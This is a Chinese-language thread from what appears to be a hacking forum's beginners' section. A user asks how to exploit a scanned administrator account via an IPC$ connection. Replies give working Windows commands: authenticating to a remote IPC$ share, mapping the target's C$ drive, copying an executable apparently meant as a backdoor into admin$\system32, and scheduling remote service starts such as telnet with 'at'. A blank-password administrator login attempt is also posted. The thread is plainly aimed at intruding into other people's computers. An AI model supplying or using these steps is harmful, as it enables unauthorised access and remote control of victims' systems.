论坛: 菜鸟乐园 标题: 扫描到了一个管理员账户,用IPC$可以连接么? 复制本贴地址    
作者: readme [readme]    论坛用户   登录
我怎么搞不定呢?

用 net use \\ip\IPC$ pas/user:
好像也不可以啊。

好像打开的也是自己的机器目录啊。

谁帮忙help一下!

地主 发表时间: 12/14 01:35

回复: ypy [ypy]   见习版主   登录
net use \\ip\ipc$ "passwd" /user:"username"
映射驱动器为:
net use * \\ip\c$
......

最主要的
对方是不是2000和有没有开139端口

B1层 发表时间: 12/14 10:06

回复: readme [readme]   论坛用户   登录
我已经建立会话了。

用 net use 可以看到共享。

但是,就是不知道怎么用这个共享。

用 copy 可以拷贝一个文件,但是,却好像是复制在自己机器上了。

我想通过这个会话,打开对方的服务,怎么用呢?
总是返回错误提示。

B2层 发表时间: 12/14 18:07

回复: ypy [ypy]   见习版主   登录
1.你可以将对方的共享映射为本地硬盘  格式为:
  net use * \\ip\共享名  
  例如共享名为c$  则为
  net use * \\ip\c$ 
  然后就可以像访问本地硬盘一样了
2.copy本地文件到远程计算机是在建立有足够权限的ipc连接后用
  copy 本地文件 \\ip\共享名\目录名  例如
  copy c:\server.exe \\ip\admin$\system32\
3.打开对方服务是你在建立管理员权限ipc连接后用
  at \\ip time net start service  例如打开对方telnet服务
  at \\ip 20:43 net start telnet
  
  还可以在建立管理员权限ipc连接后回桌面
  右键单击[我的电脑]-[管理]  
  然后右键单击[计算机管理(本地)]-[连接到另一台计算机]
  填入ip 
  就可以管理对方服务了

  

B3层 发表时间: 12/14 20:20

回复: readme [readme]   论坛用户   登录
这么详细!

感激不尽!

I 'll try.

B4层 发表时间: 12/14 21:27

回复: ypy [ypy]   见习版主   登录
不谢

B5层 发表时间: 12/14 21:33

回复: readme [readme]   论坛用户   登录
at 命令被禁止了。

那可能这个用户不是管理员。对吧。

B6层 发表时间: 12/14 21:48

回复: ypy [ypy]   见习版主   登录
一种是你所说的情况
还有一种可能是schedule服务没开

B7层 发表时间: 12/14 22:05

回复: readme [readme]   论坛用户   登录
今晚一定要成功一次。

还有,有 net start termservice 这个命令么?



B8层 发表时间: 12/14 22:11

回复: ypy [ypy]   见习版主   登录
你能把你现在的情况详细说一下吗
看看我能不能想出一个完整的方法

B9层 发表时间: 12/14 22:19

回复: BlueSnoopy [bluesnoopy]   论坛用户   登录
如果对方关了ipc$,那就没法了

B10层 发表时间: 12/14 22:26

回复: ypy [ypy]   见习版主   登录
对了
我第一个回帖已经说过了
对方有没有开139端口

B11层 发表时间: 12/14 22:30

回复: liuqingzhi [liuqingzhi]   论坛用户   登录
net use \\ip\ipc$ "" /user:"administrator"


B12层 发表时间: 12/24 16:03

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号